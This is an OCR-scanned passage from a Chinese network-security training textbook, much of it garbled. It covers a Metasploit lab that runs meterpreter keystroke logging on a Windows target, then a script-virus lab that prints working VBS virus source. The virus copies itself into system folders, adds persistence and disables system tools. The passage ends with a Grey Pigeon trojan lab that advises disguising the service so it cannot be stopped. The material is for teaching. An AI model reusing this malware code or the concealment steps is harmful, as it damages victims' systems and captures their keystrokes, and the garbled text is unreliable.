1856 632  wmiprvse.exe 
lem\wmiprvse .exe 


svchost.exe 


logon. ser 


dfssvc.exe 


eterpreter > migrate 1512 
*] Migrating то 1512 
(+ Migration completed successfully 


h 


DCN-OTUOXLAM3PSVAdministrator C:\WINDOWS\systen32\NO 
NT AUTHORITYANETWORK SERVICE — C: WWINDOWSVsystem32Asv 
NT AUTHORITYASYSTEM C: WINDONSNSysten32Vsv 
NT AUTHORITYASYSTEM C: WINDOWS Vsystem32Asp 
NT AUTHORITYANETWORK SERVICE....C:wWINDONS|systen32Wns 
NT AUTHORITYALOCAL SERVICE „~C VWINDOWS Sys ten32 sv 
DCH-OTUOXLAMGPSVAdminfstrator C: WINDOWSNSysten32Nlo 
NT AUTHORITYASYSTEM C: WINDOWS S ysten32VDf 
DCN-OTUOXLAMGPSVAdministrator C: WINDOWSWExplorer.EX 
DCN-OTUOXLAMGPSMAdministrator C: WINDOWSVSysten32 Vct 


Qi WINDOWS Js ygten32A dn 


DCN-OTUDXLAM3pS V Adninistrato: 
SI NDOWSVSysten32 co 


NT AUTHPRITY\SYSTEN 


"pcu-ordpxtArdps Ain: п Ва tor 
C: NWINDOWSA s y$tÉm32 b. 





图 3-46 ЖР explorer. exe 程序 


File Edit View Terminal Нер 
832 452 svchost.exe 
chost .exe 

452 svchost.exe 


1032 452 
loolsv.exe 
1060 452 
|dtc.exe 
1184 452 
chost .exe 
1280 408 
gon. scr 
1316 452 
|ssvc.exe 
1512 1496 explorer.exe 
Е 

1588 1512 
fnon.exe 
1624 1512 
a 

1640 1624 conime.exe 
nime .exe 

1856 632 М ргучбхе 
lemwniprvse.exe * 


spoolsv.exe 
msdtc.exe 
svchost.exe 
logon.scr 


dfssvc.exe 


ctfmon.exe 


cmd.exe 


Imeterpreter > migrate 1512 

[*] Migrating to 1512 

[*] Migration completed successfully. 
|neterpreter > getuid 

Server username: DCN-OTUOXLAM3PSVAdministrator 
[neterpreter > 





NT AUTHORITYNNETWORK SERVICE С: WINDOWS system32Asv 


NT AUTHORITYNSYSTEM C:\WINDOWS\System32\sv 


NT AUTHORITYNSYSTEM C:VWINDOWS\System32\sp 


МТ AUTHORITYANETWORK- SERVICE......C.; WINDOWS s ys ten32Vns 


NT AUTHORITYNLOCAL SERVICE WINDOWS System32\ sv 


DCN-OTUOXLAM3PS\Administratgr CWINDOWS\ Sys ten32\to 


NT AUTHORITYNSYSTEM C: WINDOwSSystem32 VDT' 


DCN-OTUOXLAM3PSNAdministrator С: WINDOWS Explorer.EX 


DCN-OTUOXLAM3PS Administrator С: WINDOWS Weysten32 ct 


DCN-OTUOXLAM3PSVAdministrator C: WINDOWS system32Vcm 


TE diat eU WINDOWS Js ygtema2^ do 


Mr "er QINWINDOWSVsysten32 yb 














: 输入 “keys 
JE 16: 在 被 攻 才 


an_dump 








ER E PL ETE" iO 


图 3-47 查看 权限 


: 启动 键盘 记录 命令 “keyscan_start”,. 开 始 记录 键盘 信息 ,如 图 3-48 所 示 。 


"命令 ,进行 键盘 输入 信息 的 监听 ,如 图 3-49 所 示 。 








本 ”等 编辑 工具 ,随便 输入 


符 ( 如 uuuu)。 


然后 ,在 BackTrack 中 青 次 运行 “keyscan_dump” 命 令 , 就 可 以 获取 到 键盘 输入 的 信息 ,如 


图 3-50 所 示 。 
Ж 17: 最 后 ,输入 “keys 








an_stop 


”命令 ,停止 键盘 记录 ,如 图 3-51 所 示 。 
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^ v x root@bt: ~ 

File Edit View Terminal Help 
chost .exe 

1280 468 logon.scr DCN-OTUOXLAM3PSVAdministrator C:\WINDOWS\System32\ lo 
gon. scr 

1316 452  dfssvc.exe NT AUTHORITYVSYSTEM C:\WINDOWS\system32\D! 
ssvc.exe 

1512 1496 explorer.exe DCN-OTUOXLAM3PS Administrator С: VWINDOWSVExplorer.EX 
Е 

1588 1512 ctfmon.exe DCN-OTUOXLAM3PSMAdministrator C: WINDOWS system32\ct 
fmon.exe 

1624 1512 cmd.exe DCN-OTUOXLAM3PSVAdsiHistrator C: WINDOMSNSystem32Vcm 
d.exe 

1640 1624 conime.exe DCN-OTUOXLAM3PS\Administrator С: WINDOWS SS te 2Nco. 


|nime.exe 
1856 632 wmiprvse.exe NT AUTHORITY\SYSTEN C: WINDOWSN system32 wb 


emwniprvse.exe 


|meterpreter > migrate 1512 
[*] Migrating to 1512. 

[*] Migration completed successfully 
песегргетег > getuid < 

[Server username gDCN- gFUOXLANP SW dT c cd 


meterpreter > Meyscailstart 


eterpreter > keyscan start 
tarting the keystroke sniffer 


Imeterpreter 
Imeterpreter 
meterpreter 
meterprete 
Imeterpreter > 





图 3-48 ”开始 记录 键盘 信息 


^ + x root@bt: ~ 
File Edit View Terminal Help 
1388 1512 ctfmon.exe DCN-OTUOXLAMSPS Administrator C:\WINDOWS\system32\ct 


fmon exe 
1624 1512 cnd.exe DCN-OTUOXLAM3PSVAdministrator C:\WINDOWS\system32\cm 


1624 conime.exe DCN-OTUOXLAMSPSVAdministrator С: WINDOWS systen32Vco 


піпе ,exe 
1856 632  wniprvse.exe Dam C; WINDOWS Vs ysten32wb 


em wniprvse,exe 


|meterpreter > migrate 1512 
[°] Migrating to 1512 

[°] Migration completed successfully 
eterpreter > getuid 

Server username: DCN-OTUOXLAM3PS\Administrator 


meterpreter > keyscan start 


1-1 Unknown command: keyscan. 


meterpreter > keyscan start 


Starting the keystroke sniffer... 


s keyscan_dump 
Dumping captured keystrokes. . 


meterpreter > 
neterpreter > 
[теїегрге{ег > 
neterpreter > 
peterpreter > 





图 3-49 进行 键盘 输入 信息 的 监听 


3.6.4 任务 与 思考 

本 实验 通过 一 个 具体 示例 ,介绍 了 Metasploit 框架 的 功能 特点 。 在 本 实验 中 ， 
Metasploit 框架 构建 在 Linux 环境 中 。 虽 然 Metasploit 是 一 款 免费 的 开源 安全 漏洞 检测 工 
具 , 但 也 可 以 安装 在 Windows 系统 上 。 
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1624 conime.exe 
1856 632 мпіргуѕе.ехе 
|еп\мтіргуѕе. ехе 
meterpreter > migrate 1512 
[*1 Migrating to 151: 
rpreter > getuid 
meterpreter > keyscan sta 


1-1 Unknown command: keyscan. 


meterpreter > keyscan start 
Starting the keystroke sniffer. 


keyscan dump 


meterpreter > keyscan dump 
Dumping captured keystrokes 





^ v X root@bt: 
File Edit View Terminal Help 
nime.exe 

1856 632 wmiprvse.exe 
jemwniprvse.exe 


meterpreter > migrate 1512 
[°] Migrating to 1512. 

[*] Migration completed successfull: 
Imeterpreter > getuid 

[server username: DCN-OTUOXLAM3PS Adi 
Imeterpreter > keyscan start 

12] Unknown command: keyscan 
|neterpreter > keyscan start 
Starting the keystroke sniffer 


meterpreter 
meterpreter 

meterpreter 

meterpreter > keyscan dump 
Dumping captured keystrokes. $ 


meterpreter > 

Ineterpreter > 

meterpreter > keyscan dump 
Dumping captured keystrokes... 
шшш 

neterpreter > keyscan stop 
Stopping the keystroke sniffer 
meterpreter > 


当 在 Windows 环境 1 


www. metasploit. com/) F 








DCN-OTUOXLAM3PSVAdministrator C:\WINDOWS\system32\co 


NT AUTHORITY\SYSTEN C:\WINDOWS\system32\wb 


[*] Migration completed successfully. 


[Server username: DCN-OTUOXLAM3PSVAdministrator 





图 3-50 获取 到 键盘 输入 的 信息 


NT AUTHORITYNSYSTEM C:\WINDOWS\systen32\wb 


y 


Iministrator 





图 3-51 停止 键盘 记录 


F 安装 Metasploit 时 ,可 以 从 Metasploit 的 官方 网 站 (http:// 
载 Windows 版 本 的 安装 程序 ,具体 的 安装 过 程 与 安装 其 他 











Windows 环境 下 的 应 用 程 
Metasploit 冲突 ,导致 安装 


语 类 似 , 只 是 在 安装 前 需要 关闭 杀毒 软件 ,否则 会 因 杀 毒 软件 与 
败 。 





Metasploit 目前 提供 了 3 种 用 户 使 用 接口 : GUI 模式 、Console 模式 和 CLI( 命 令 行 ) 模 
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式 (原来 还 提供 一 种 Web 模式 ,目前 已 经 不 再 支持 )。 这 3 种 模式 的 使 用 特点 各 异 ,一 般 建 
议 在 Console 模式 中 使 用 ,如 图 3-52 所 示 ,因为 在 Console 模式 中 不 仅 可 以 使 用 Metasploit 
所 提供 的 所 有 功能 ,还 可 以 执行 其 他 的 外 部 命令 (如 ping) 。 








一 Netasploit 
File Edit View Help 


M ы] 


metasploit v3.S.1-release [core:3.5 арі:1.0] 
635 exploits - 314 auxiliary 

215 payloads - 27 encoders - 8 nops 

svn r11338 updated 37 days ago (2010.12.14) 


Warning: This copy of the Metasploit Framevork vas last updated 37 days ago. 
We recommend that you update the framework at least every other day. 
For information on updating your c Metasploit, ple: 
http://wwv.metasploit.com/redmine/projects/framevork/wiki/Updating 





3-52 Metasploit 的 Console 模式 
希望 对 Linux 操作 不 是 很 熟悉 的 读者 可 以 选择 在 Windows 环境 下 安装 和 配置 
Metasploit 架构 。 
另外 ,在 本 信 
具体 实验 ， 





的 基础 上 ,读者 可 以 在 Metasploit 帮助 文档 和 技术 资料 的 帮助 下 ,通过 
掌握 Metasploit 的 主要 应 用 功能 
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恶意 代码 是 计算 机 网 络 中 出 现 较 早 .发展 较 快 、. 影 响 面 较 广 的 一 种 攻击 方式 ,尤其 是 计 
算 机 病毒 的 出 现 使 人 们 较 早 意识 到 计算 机 系统 及 信息 应 用 中 存在 的 安全 威胁 ,网 络 蠕虫 使 
大 家 真正 感受 到 了 计算 机 网 络 在 为 各 类 应 用 提供 便利 的 同时 也 快速 放大 了 恶意 攻击 的 实施 
范围 ,木马 的 隐藏 性 ,欺骗 性 和 攻击 性 使 大 家 感受 到 了 互联 网 上 存在 的 种 种 陷阱 ,针对 操作 
系统 的 Rootkit 使 攻击 手段 从 系统 内 核 逐 渐 扩 展 到 应 用 程序 和 系统 引导 程序 。 在 大 量 的 安 
全 事件 中 ,恶意 代码 攻击 占 了 较 大 的 比例 。 为 此 ,加 强 对 恶意 代码 攻防 的 实 训 对 提供 安全 应 
对 能 力 将 起 到 十 分 重要 的 作用 。 


4.1 脚本 病毒 编写 实验 


4.1.1 预备 知识 : 脚本 的 攻防 


脚本 (Script) 通 常 可 以 由 应 用 程序 临时 调用 并 执行 。 各 类 脚本 被 广泛 地 应 用 于 Web 网 
页 设计 中 ,因为 脚本 不 仅 可 以 减 小 网 页 的 规模 和 提高 网 页 浏览 速度 ,而 且 可 以 丰富 网 页 的 显 
示 方 式 ( 如 动画 声音 等 )。 例 如 ,为 了 方便 联系 ,一 些 单位 喜欢 在 单位 网 站 的 显眼 位 置 链接 
单位 或 领导 邮箱 的 地 址 , 当 用 户 单 击 网 页 上 的 邮箱 地 址 时 会 自动 调用 本 地 计算 机 上 的 电子 
邮件 客户 端 软件 (如 Outlook Express, Foxmail 等 ) ,这 一 功能 就 是 通过 脚本 来 实现 的 。 

正 是 因为 脚本 具有 语法 和 结构 较为 简单 .脚本 程序 编写 容易 及 不 需要 事先 编译 等 特点 ， 
往往 被 攻击 者 利用 。 例 如 ,在 脚本 中 加 入 一 些 破坏 计算 机 系统 的 命令 ,这 样 当 用 户 浏览 网 页 
时 ,一 旦 调用 这 类 脚本 , 便 会 使 用 户 的 系统 受到 攻击 。 

用 户 可 以 根据 对 所 访问 网 页 的 信任 程度 选择 安全 等 级 ,特别 是 对 于 那些 信任 度 较 低 网 
页 ,更 不 要 轻易 允许 使 用 脚本 。 


4.1.2 实验 目的 和 条 件 


1. 实验 目的 

通过 本 实验 ,使 读者 主要 掌握 以 下 内 容 。 

(1) 脚本 与 脚本 病毒 的 基本 概念 。 

(2) 常见 脚本 病毒 的 工作 原理 ,种 类 及 特点 。 

(3) 简单 脚本 病毒 的 编写 方法 。 

(4) 常见 脚本 工具 的 使 用 方法 。 

2. 实验 条 件 

建议 本 实验 在 一 台 运 行 Windows XP 及 以 上 版 本 的 虚拟 机 上 进行 , 且 虚 拟 机 上 不 要 安 
装 杀毒 软件 。 同 时 ,准备 实验 中 使 用 的 VBS 脚本 病毒 生成 器 软件 “病毒 制造 机 ”。 





第 4 章 恶意 代码 攻防 实 训 119 





4.1.3 实验 过 程 


1. 制造 病毒 

制造 病毒 主要 操作 步骤 如 下 。 

步骤 1: 正常 登录 到 实验 场景 中 使 用 的 目标 主机 ,借助 脚本 病毒 生成 器 生成 脚本 病毒 。 
本 实验 使 用 的 是 “病毒 制造 机 v1. 0”, 在 该 软件 的 安装 过 程 中 , 当 出 现 如 图 4-1 所 示 的 “病毒 
复制 选项 ”界面 时 ,为 便于 读者 对 病毒 不 同 特征 的 理解 ,可 同时 选中 所 有 的 复 选 框 。 

步骤 2: 单 击 * 下 一 步 ?按钮 ,进入 如 图 4-2 所 示 的 “禁止 功能 选项 ” 设 定 界面 ,根据 需要 
进行 设 定 。 例 如 ,如 果 选 中 “禁止 右键 菜单 " 复 选 框 , 当 运 行 了 该 病毒 后 , 右 击 时 将 无 法 弹出 
快捷 菜单 。 

















J| Яа v1.0 T ASHEN v1.0 
第 二 步 病毒 复制 选项 第 三 步 禁止 功能 选项 
E) sut" E) 开机 自动 E 生 
StlñWagl+8yynoors its c ползти 口 REXARPRE D жатаат 
D ees E] SERAIS- 
[SEES eine dae N Ep 村 上 借用 注册 家 编 加 器 О жоны 
Ed | SERERE ажи О Ahma Иган 
回 ж чон’ а О 9 "EM" 
病毒 副本 文件 名 : [ryste О 禁止 进入 Ms-Dos 实 模式 D) жс С 
ү xi-5 | 1 下 - 步 MN sly aasma] 
图 4-1 选择 病毒 复制 方式 42 设置 “禁止 功能 选项 ” 


步骤 3: 单 击 “ 下 一 步 "按钮 ,进入 如 图 4-3 所 示 的 “病毒 提示 对 话 框 ? 设 定 界面 时 ,根据 
需要 设置 有 关 开机 时 病毒 的 执行 情况 。 当 选中 “设置 开机 提示 对 话 框 " 复 选 框 ,并 设置 了 提 
示 框 标题 和 内 容 等 后 ,相关 信息 将 以 对 话 框 方式 在 开机 时 自动 显示 。 

步骤 A. 单 击 “下 一 步 ?按钮 ,进入 如 图 4-4 所 示 的 “病毒 传播 选项 ” 设 定 界面 ,根据 需要 
进行 设 定 。 当 选中 * 通 过 电子 邮件 进行 自动 传播 (蠕虫 )” 复 选 框 时 ,病毒 可 以 向 指定 数量 的 
用 户 发 送 垃圾 邮件 。 





i| 病毒 制造 机 v1.0 


第 四 步 病毒 提示 对 话 杠 

D) 设置 开机 提示 对 话 栓 
энинин: [T] 
emeuexene: [T 


第 五 步 病毒 传播 选项 
口 通过 电子 邮件 进行 自动 传播 ( 业 虫 


每 次 运行 自动 向 地 址 小 中 的 前 [TT] 
жука. 








MW tw | Pam DY rs | arr] 
图 4-3 设置 开机 时 病毒 的 执行 情况 图 4-4 “病毒 传播 选项 ” 设 定 界面 





步骤 5: 单 击 “ 下 一 步 ”按钮 ,进入 “IE 修改 选项 ” 设 定 界面 ,根据 需要 进行 设 定 。 注 意 ， 
当选 中 “设置 默认 主页 ” 复 选 框 后 ,会 弹出 “设置 主页 ”对 话 框 ,需要 读者 输入 要 修改 的 下 浏 
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览 器 主页 地 址 ( 即 每 次 打开 IE 浏览 器 时 默认 打开 的 主页 地 址 ) ,如 图 4-5 所 示 。 








图 4-5 设置 还 浏览 器 修改 选项 


步 又 6. 单 击 * 下 一 步 ?按钮 ,在 出 现 的 如 图 4-6 所 示 的 对 话 框 中 选择 所 生成 的 脚本 病毒 
存放 的 位 置 , 单 击 “ 开 始 制造 ?按钮 ,生成 病毒 文件 。 








E 病毒 制造 机 v1-0 


第 七 步 开始 制造 病毒 
请 输入 病毒 文件 存放 位 置 : 


F \Documents and SettinesW Ici 


MW uie | тяїма 





图 4-6 选择 所 生成 的 脚本 病毒 存放 的 位 置 

此 时 ,可 看 到 相应 路 径 下 ,已 经 生成 了 脚本 病毒 文件 。 

2. 感染 病毒 并 观察 感染 后 的 系统 变化 情况 

主要 操作 步骤 如 下 。 

步 又 1: 将 生成 的 脚本 病毒 文件 置 于 虚拟 机 中 ,在 其 上 双击 使 之 运行 。 为 保证 完整 准确 
地 查看 病毒 的 感染 效果 ,可 重启 已 经 感染 了 病毒 的 虚拟 机 系统 。 然 后 ,根据 病毒 文件 生成 时 
的 设置 ,观察 系统 感染 了 病毒 后 的 表现 情况 。 

步骤 2: 观察 系统 文件 夹 下 的 异常 变化 ,可 以 发 现 , 在 C:\Windows、C:\Windows\ 
system32 下 多 了 不 明 来 源 的 脚本 文件 。 

步骤 3: 检查 各 项 系统 功能 ,发 现 右键 快捷 菜单 功能 被 禁止 。 在 “开始 ?菜单 中 “运行 
命令 被 去 除 ,利用 Win 十 R 组 合 键 (“运行 "的 快捷 键 ) 时 ,会 弹出 报错 信息 ,如 图 4-7 所 示 。 
在 C:\Windows 下 运行 注册 表 管 理 器 程序 regedit. exe, 同 样 也 会 弹出 报错 信息 ,提示 功能 
被 禁 ,如 图 4-8 所 示 。 





o жиынын Баарын. зоа ЕЕК. 


Cw 





图 4-7 系统 报错 信息 图 4-8 注册 表 编辑 器 已 禁用 的 提示 信息 
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步骤 4: 检查 IE 浏览 器 的 各 项 功能 ,查看 异常 时 ,会 发 现下 浏览 器 主页 被 恶意 算 改 。 
依次 选择 “菜单 栏 ”>“ 工 具 ”>“Internet 选项 ”选项 ,发 现 无 法 正常 打开 Internet 选项 。 另 
外 ,IE 浏览 器 的 右键 快捷 菜单 功能 也 被 禁用 。 


3; 





脚本 病毒 代码 分 析 


分 析 脚 本 病毒 的 源码 ,理解 各 条 语句 的 含义 。 用 “记事 本 ”等 文本 编辑 工具 打开 病毒 脚 
本 ,查看 其 代码 。 代 码 内 容 摘录 如 下 。 


On Error Resume Next 

Set fs = CreateObject("Scripting. FileSystemObject") 

Set dirl- fs.GetSpecialFolder(0) 

Set dir2 = fs. GetSpecialFolder(1) 

Set so = CreateObject("Scripting. FileSystemObject") 

dim r 

Set г = CreateObject("Wscript. Shell") 

so. GetFile(WScript. ScriptFullName).Copy(dirl&"MWWin32systenm. vbs") 

so. GetFile(WScript.ScriptFullName).Copy(dir2&"V Win32systenm. vbs") 

so. GetFile(WScript. ScriptFullName).Copy(dirl&"VStart Menu\Programs\ 启 动 \ Win32systen. vbs") 
г. Regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun", 1, 
"REG DWORD" 

r. Regwrite " HKCU V Software V Microsoft V Windows V CurrentVersion V Policies V System V 
DisableRegistryTools",1,"REG DWORD" 

r. Regwrite " HKCU V Software V Microsoft V Windows V CurrentVersion V Policies V Explorer V 
NoLogOff",1,"REG DWORD" 

r.Regwrite " HKLM V Software V Microsoft V Windows V CurrentVersion V Run V Win32system "," 
Win32systenm. vbs" 

г. Regwrite " HKCU V Software V Microsoft V Windows V CurrentVersion V Policies V Explorer V 
NoViewContextMenu",1,"REG DWORD" 

r. Regwrite " HKCU V Software V Policies V Microsoft V InternetExplorer V Restrictions V 
NoBrowserContextMenu",1,"REG DWORD" 

г. Regwrite " HKCU V Software V Policies V Microsoft V Internet Explorer V Restrictions V 
NoBrowserOptions",1,"REG DWORD" 

r.Regwrite "HKEY USERSV. DEFAULT A Software MMicrosoftV Internet ExplorerMMainVStart Page", 
http://www. ta0ba0. com 


下 面 对 主 要 语句 的 含义 进行 分 析 。 


第 


1 行 请 句 的 含义 是 启用 错误 处 理 程序 ,目的 在 于 当 程 序 发 生 错误 时 忽略 错误 而 继续 


向 下 执行 ,从 而 不 要 打 断 程序 的 执行 流程 ,保证 后 续 的 代码 可 以 继续 执行 。 

第 3 行 和 第 4 行 语句 中 ,使 用 了 GetSpecialFolder(folderspec) 函数 , 当 参 数 folderspec 
等 于 0 时 ,函数 返回 值 为 Windows 文件 夹 (一 般 为 C:\Windows £X С.\МІММТ); 当 参 数 
folderspec 等 于 1 时 ,函数 返回 值 为 System 文件 夹 (常见 于 C:\WindowsNsystem32) 。 

第 8 一 10 行 语 句 的 作用 依次 为 复制 病毒 文件 夹 到 Windows 文件 夹 .system32 文件 夹 、 
启动 菜单 。 


第 





























11—15 行 语句 的 作用 依次 为 禁止 “运行 ?菜单 .禁止 使 用 注册 表 编 辑 器 .禁止 注销 菜 


单 、 开 机 自动 运行 及 禁止 右键 快捷 菜单 。 


第 


16—18 行 语句 的 作用 依次 为 禁用 IE 浏览 器 右键 菜单 .禁止 Internet 选项 .设置 默认 
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主页 为 http://www. ta0ba0. com, 
4. 清除 病毒 脚本 的 编写 方法 


打开 “记事 本 ”程序 ,根据 病毒 脚本 内 容 , 请 读者 学 习 编 写 相 应 的 清除 病毒 的 脚本 ,内 容 
如 下 。 


Set fs = CreateObject("Scripting. FileSystemObject") 

Set dirl = fs. GetSpecialFolder(0) 

Set dir2 = fs. GetSpecialFolder(1) 

Set so = CreateObject("Scripting. FileSystemObject") 

dim r 

Set г = CreateObject("Wscript.Shell") 

r. Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce\deltree. exe" , " start. 

exe /m deltree /y "&dir1&"N Win32system. vbs" 

8 r.Regwrite "HKLM\ Software\Microsoft\Windows\CurrentVersion\RunOnce\ deltree. ехе", " start. 
exe /n deltree /y "&dir2&"V Win32system. vbs" 

9 r.Regwrite "HKLMMSoftware Microsoft WindowsVCurrentVersionVRunOnceMdeltree. ехе", " start. 
exe /m deltree /y "&dirl&"VStart Menu\Programs\ 启 动 \ Win32system. vbs" 

10 r.Regwrite"HKCUVSoftwareV Microsoft V Windows VCurrentVersionV Policies V Explorer WNoRun" , 0, 
"REG DWORD" 

11 r. Regwrite " HKCU V Software V Microsoft V Windows V CurrentVersion V Policies V System V 
DisableRegistryTools",0,"REG DWORD" 

12 r.Regwrite"HKCUMSoftwareMMicrosoftVWindowsVCurrentVersionVPoliciesV Explorer WV NoLogOf f" , 
0,"КЕС DWORD" 

13 r.Regwrite "HKLMVSoftwareMicrosoftVWindowsVCurrentVersionVRunV Win32system ","" 

14 r.Regwrite " HKCU \ Software V Microsoft V Windows V CurrentVersion V Policies V Explorer V 
NoViewContextMenu",0, "REG DWORD" 

15 r. Regwrite " HKCU V Software V Policies V Microsoft V Internet Explorer V Restrictions V 
NoBrowserContextMenu", 0, "REG DWORD" 

16 r. Regwrite " HKCU V Software V Policies V Microsoft V Internet Explorer V Restrictions V 
NoBrowserOptions",0,"REG DWORD" 

17 r.Regwrite "HKEY USERSV. DEFAULT V SoftwareMMicrosoftV Internet Explorer\Main\ Start Page", 

"about:blank" 


чоо щл ш юк 


将 以 上 脚本 语句 保存 为 一 个 . vbs 的 脚本 。 在 该 脚本 上 双击 运行 后 ,然后 重启 系统 , 即 
可 完成 病毒 的 消除 工作 。 


4.1.4 任务 与 思考 


在 本 实验 的 基础 上 ,读者 可 继续 学 习 脚 本 病毒 及 防范 方法 。 脚 本 病毒 是 计算 机 病毒 的 

-种 新 形式 ,主要 采用 脚本 语言 编写 , 它 可 以 对 系统 进行 操作 ,包括 创建 、 修 改 、 删 除 文件 , 甚 

至 格式 化 硬盘 。 脚 本 病毒 的 传播 速度 快 ,危害 性 大 。 借 助 脚本 语言 的 特点 ,脚本 病毒 的 书写 

形式 灵活 ,容易 产生 变种 。 目 前 网 络 上 存在 的 脚本 病毒 绝 大 多 数 都 用 VBScript 和 
JavaScript 编写 。 

传统 的 病毒 检测 方法 包括 特征 代码 法 、 校 验 和 法 ,行为 监测 法 、 软 件 模 拟 法 等 。 其 中 , 特 

征 代码 法 提取 病毒 的 某 一 小 段 特征 代码 进行 识别 ,所 以 对 未 知 病毒 几乎 无 法 预测 ,另外 新 增 

病毒 的 数量 在 不 断 加 大 的 情况 下 ,病毒 特征 代码 的 数量 也 在 加 大 ,会 影响 检测 速度 ; 校 验 和 

法 是 对 文件 做 校 验 和 ,并 将 其 保存 ,一 旦 校 验 和 改变 ,就 视 为 异常 ,这 种 检测 方法 依赖 文件 长 
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度 和 内 容 , 预 警 过 于 敏感 容易 产生 误 报 ; 行为 监测 法 从 理论 上 讲 可 以 监测 到 所 有 未 知 病毒 ， 
但 是 实现 复杂 、 速 度 较 低 。 


4.2 木马 攻防 实验 


4.2.1 预备 知识 : 网 页 木马 的 攻击 原理 


从 技术 实现 来 看 ,网 页 木马 主要 利用 了 Web 浏览 器 软件 中 所 支持 的 客户 端 脚本 执行 能 
力 , 通 过 对 Web 浏览 器 软件 安全 漏洞 的 利用 而 对 客户 端 实施 渗透 攻击 ,在 获取 了 对 客户 端 
主机 的 远程 代码 执行 权限 后 再 植 人 木马 程序 ,进而 发 起 有 针对 性 的 攻击 。 从 发 展 历程 来 看 ， 
网 页 木马 是 针对 网 络 服务 的 一 种 攻击 行为 ,只 是 早期 的 攻击 主要 针对 服务 器 软件 ,而 网 页 木 
马 则 主要 针对 Web 浏览 器 软件 。 

网 页 木马 顾名思义 是 指 主要 攻击 Web 网 页 的 木马 程序 ,其 核心 仍然 是 木马 ,只 是 攻 
对 象 专门 针对 网 页 ,主要 利用 Web 浏览 器 软件 工作 机 制 存在 的 安全 漏洞 而 进行 的 一 种 攻 间 
行为 。 从 攻击 的 本 质 来 看 ,几乎 所 有 的 攻击 行为 都 是 一 种 漏洞 利用 ,这 种 漏洞 主要 包括 软件 
存在 的 安全 漏洞 ,以 及 因 安 全 策略 的 配置 不 当 或 错误 配置 导致 的 配置 漏洞 。 网 页 木马 同时 
利用 了 软件 的 安全 漏洞 和 配置 漏洞 。 

灰 铝 子 木马 是 国内 一 个 著名 的 后 门 程序 。 灰 鸽子 变种 木马 运行 后 ,会 自我 复制 到 
Windows 目录 下 ,并 自行 将 安装 程序 删除 ; 修改 注册 表 ,将 病毒 文件 注册 为 服务 项 实现 开机 
自动 运行 ; 注入 指定 的 进程 中 隐藏 自我 ,防止 被 杀毒 软件 查 杀 ; 自动 开启 IE 浏览 器 ,以 便 
与 外 界 进行 通信 , 侦 听 攻击 者 的 指令 ,在 用 户 不 知情 的 情况 下 连接 攻击 者 指定 站 点 , 盗 取 用 
户 信息 、 下 载 其 他 特定 程序 。 


4.2.2 实验 目的 和 条 件 


1. 实验 目的 

在 学 习 木马 工作 原理 的 基础 上 ,结合 本 实验 ,通过 具体 的 操作 继续 学 习 木 马 程序 的 产 
生 、 传 播 .隐藏 和 攻击 方法 。 同 时 ,通过 对 木马 程序 清除 过 程 的 学 习 , 掌 握 日 常 应 用 中 木马 程 
序 的 检测 和 清除 方法 。 

2. 实验 条 件 

本 实验 建议 读者 在 虚拟 机 环境 下 进行 ,需要 提供 两 台 虚 拟 机 ,分 别 为 客户 端 计 算 机 
УРС1(1Р 地 址 为 192. 168. 1. 115) 和 服务 器 端 计算 机 VPC2(IP 地 址 为 192. 168. 1. 116 ) , 操 
作 系 统 可 以 同时 使 用 Windows ХР 或 其 他 的 版 本 。 

本 实验 使 用 了 灰 钥 子 远 程控 制程 序 , 该 工具 虽然 主要 用 于 计算 机 的 远程 控制 管理 ,但 其 
工作 原理 和 过 程 与 木马 几乎 一 致 。 


4.2.3 实验 过 程 








Ht Er 


1. 木马 攻击 的 实现 
实现 木马 攻击 的 主要 操作 步骤 如 下 。 
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步骤 1: 正常 登录 到 实验 场景 中 的 客户 端 计算 机 (VPC1) ,安装 * 灰 铝 子 远程 控制 程序 ”， 
成 功 安装 后 的 灰 铝 子 控制 端 界 面 如 图 4-9 所 示 。 

OO ЕЕН ГЕТ 192 168.1 115 go 

:文件 四 设置 加 ТАФ LIS . 


x +" 


: $ os 
шз: шш. ЖБ 1: ас 





























































































































图 4-9 REFER 


步骤 2: 在 客户 端 生成 服务 器 端 程序 。 单 击 图 4-9 中 的 “配置 服务 程序 ?图标 ,弹出 图 4-10 
所 示 的 操作 界面 ,对 服务 器 进行 配置 。 


Сә кшк 









































В 4-10 对 服务 器 进行 配置 


在 “IP 通知 http 访问 地 址 .DNS 解析 域名 或 固定 IP” 文 本 框 中 填写 客户 端 计算 机 
(VPC1) 的 IP 地 址 (本 实验 为 192. 168. 1. 115) ,同时 可 以 设置 上 线 图 像 、 上 线 分 组 `、 上 线 备 
ik .连接 密码 等 内 容 ,读者 可 以 根据 实验 需要 进行 设置 。 

选择 “启动 项 设置 ?选项 卡 ,在 如 图 4-11 所 示 的 对 话 框 中 配置 木马 的 启动 功能 。 读 者 可 
以 同时 选中 “Win98/2000/XP 下 写 入 注册 表 启 动 项 ”和 “Win2000/XP 下 优先 安装 成 服务 启 
动 " 复 选 框 。 在 “显示 名 称 ” 和 “服务 名 称 ” 文 本 框 中 可 以 任意 填写 (建议 尽量 填写 与 系统 有 关 
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的 单词 ); 在 “描述 信息 ”文本 框 中 说 明 此 项 服务 是 系统 服务 (此 处 的 设置 非常 重要 ,建议 选 
择 不 可 停止 的 服务 ,以 增加 蒙 项 性 ,也 可 以 更 好 地 隐藏 自己 ) 。 

选择 “高 级 选项 ”选项 卡 ,在 如 图 4-12 所 示 的 对 话 框 中 配置 进程 的 启动 和 隐藏 方式 ,以 
及 木马 程序 是 否 需要 进行 加 壳 处 理 (本 实验 暂时 选中 “不 加 壳 ” 单 选 按钮 ) 。 














EFS 





< Win98/2000/ 邓 下 写 入 注册 表 启动 项 
V Win20007XF 下 忧 先 安装 成 服务 启动 
显示 名 称 ; [Windows power control 

Б®&й: | 
描述 信息 : [Еа а, 十 分 重要 *| | 


v ЯВА. FERE Yin2000/xp 系统 
хя: 

使 用 IEXPLORE. EXE 进程 启动 只 支持 是 a2000/XP 系 统 Y 
ж TS CR Wx 加 高 
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保存 路 径 : 7 Stools VR Foo а) 生成 服务 器 























图 4-11 “启动 项 设置 "选择 卡 图 4-12 “高 级 选项 ”选项 卡 








安装 插件 。 灰 合子 提供 了 大 量 的 捅 件 功 能 ,如 图 4-13 所 示 , 可 以 根据 自己 的 需要 添加 
相应 的 插件 。 
配置 服务 器 结束 后 , 单 击 “ 生 成 服务 器 ”按钮 ,提示 配置 成 功 ,如 图 4-14 所 示 。 


СІЯ 























